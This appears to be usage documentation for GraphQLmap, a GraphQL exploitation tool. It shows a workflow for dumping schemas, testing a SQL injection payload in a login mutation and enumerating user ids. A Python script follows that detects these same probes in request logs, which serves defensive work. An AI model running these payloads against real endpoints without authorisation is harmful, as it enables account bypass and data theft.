Description
GraphQLmap is a scripting engine for interacting with and exploiting GraphQL endpoints. It supports introspection queries, enumeration of query and mutation fields, SQL/NoSQL injection through GraphQL parameters, and field discovery based on the server's "Did you mean" suggestions for mistyped field names.
Installation
BASH
git clone https://github.com/swisskyrepo/GraphQLmap.git
cd GraphQLmap
pip3 install -r requirements.txt
Basic Usage
BASH
# Connect to GraphQL endpoint
python3 graphqlmap.py -u https://target.com/graphql
# Interactive shell commands:
#   dump_new  - Dump schema using introspection
#   dump_old  - Legacy introspection dump
#   nosqli    - NoSQL injection test
#   sqli      - SQL injection test
Advanced Usage
BASH
# With authentication
python3 graphqlmap.py -u https://target.com/graphql \
--headers '{"Authorization": "Bearer TOKEN"}'
# Method override (use GET)
python3 graphqlmap.py -u https://target.com/graphql --method GET
# Custom proxy
python3 graphqlmap.py -u https://target.com/graphql --proxy http://127.0.0.1:8080
# Inline query
python3 graphqlmap.py -u https://target.com/graphql \
--query '{ users { id name email } }'
Common Workflows
BASH
# Step 1: Check if introspection is enabled
curl -s -X POST https://target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { queryType { name } mutationType { name } } }"}' | jq
# Step 2: Dump schema
python3 graphqlmap.py -u https://target.com/graphql
> dump_new
# Step 3: Look for sensitive queries
# users, admin, internal, config, debug
# Step 4: Test injections on mutation inputs
> sqli { mutation { login(user: "admin' OR 1=1--", pass: "x") { token } } }
# Step 5: Test IDOR
# Query user data with different IDs
# { user(id: 1) { email } }
# { user(id: 2) { email } }
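Seen from the other side of the endpoint, each step of the workflow above leaves a recognisable trace in the GraphQL request log: introspection probes reference `__schema` or `__type`, injection tests carry quote-and-operator payloads inside string arguments, and IDOR probing shows one client walking the `id` argument of the same field. The following is an added detection example, not part of GraphQLmap or its documentation; it runs on constructed JSON-lines request logs (one object per request with `ts`, `src` and `body.query` fields, a format assumed here for illustration) using only the Python standard library.

```python
"""Flag GraphQL introspection probes, injection-style payloads and id enumeration
in a JSON-lines request log. Added defender-side example; stdlib only."""
import json
import re
from collections import defaultdict

# Constructed sample log: one JSON object per line, one per GraphQL request.
SAMPLE_LOG = """\
{"ts":"2024-01-01T10:00:00Z","src":"203.0.113.5","body":{"query":"{ __schema { queryType { name } mutationType { name } } }"}}
{"ts":"2024-01-01T10:00:01Z","src":"203.0.113.5","body":{"query":"query IntrospectionQuery { __schema { types { name fields { name } } } }"}}
{"ts":"2024-01-01T10:00:02Z","src":"198.51.100.7","body":{"query":"{ users { id name email } }"}}
{"ts":"2024-01-01T10:00:03Z","src":"203.0.113.5","body":{"query":"mutation { login(user: \\"admin' OR 1=1--\\", pass: \\"x\\") { token } }"}}
{"ts":"2024-01-01T10:00:04Z","src":"198.51.100.7","body":{"query":"{ user(id: 1) { email } }"}}
{"ts":"2024-01-01T10:00:05Z","src":"198.51.100.7","body":{"query":"{ user(id: 2) { email } }"}}
not json at all
"""

# Introspection meta-fields defined by the GraphQL spec.
INTROSPECTION_RE = re.compile(r"\b__(?:schema|type)\b")
# Double-quoted GraphQL string literals, honouring backslash escapes.
STRING_LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Heuristic markers of SQL/NoSQL payloads inside a string argument: a quote
# followed by a boolean operator, a trailing SQL comment, or a MongoDB operator.
INJECTION_MARKERS = [
    re.compile(r"'\s*(?:or|and)\b", re.IGNORECASE),
    re.compile(r"'\s*--|--\s*$"),
    re.compile(r"\$(?:gt|ne|where|regex)\b"),
]
# A field called with a numeric id argument, e.g. user(id: 1).
ID_ARG_RE = re.compile(r"(\w+)\(\s*id\s*:\s*(\d+)")


def parse_log(text):
    """Return (records, skipped) where records are the JSON-object lines."""
    records, skipped = [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1
            continue
        if isinstance(rec, dict):
            records.append(rec)
        else:
            skipped += 1
    return records, skipped


def classify_query(query):
    """Return the set of tags ('introspection', 'injection') a query matches."""
    tags = set()
    if INTROSPECTION_RE.search(query):
        tags.add("introspection")
    for literal in STRING_LITERAL_RE.findall(query):
        if any(marker.search(literal) for marker in INJECTION_MARKERS):
            tags.add("injection")
            break
    return tags


def analyze(text, enumeration_threshold=2):
    """Summarise suspicious activity per source. The enumeration threshold is
    deliberately low for the sample; a production rule would use a higher one."""
    records, skipped = parse_log(text)
    report = {"introspection": [], "injection": [], "enumeration": [],
              "skipped_lines": skipped}
    ids_seen = defaultdict(set)  # (src, field) -> distinct id values requested
    for rec in records:
        query = (rec.get("body") or {}).get("query")
        if not isinstance(query, str):
            continue
        src, ts = rec.get("src", "?"), rec.get("ts", "?")
        for tag in classify_query(query):
            report[tag].append((ts, src))
        for field, obj_id in ID_ARG_RE.findall(query):
            ids_seen[(src, field)].add(obj_id)
    for (src, field), ids in sorted(ids_seen.items()):
        if len(ids) >= enumeration_threshold:
            report["enumeration"].append((src, field, sorted(ids)))
    return report


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for key in ("introspection", "injection", "enumeration"):
        print(f"{key}: {result[key]}")
    print(f"skipped_lines: {result['skipped_lines']}")
```

On the sample, both introspection requests and the `login` payload are attributed to `203.0.113.5`, while `198.51.100.7` is reported for walking `user(id: ...)`. The literal-level markers are intentionally narrow so that ordinary apostrophes in names do not fire; widen them with care, and treat the enumeration rule as a per-source rate signal rather than a single-request verdict.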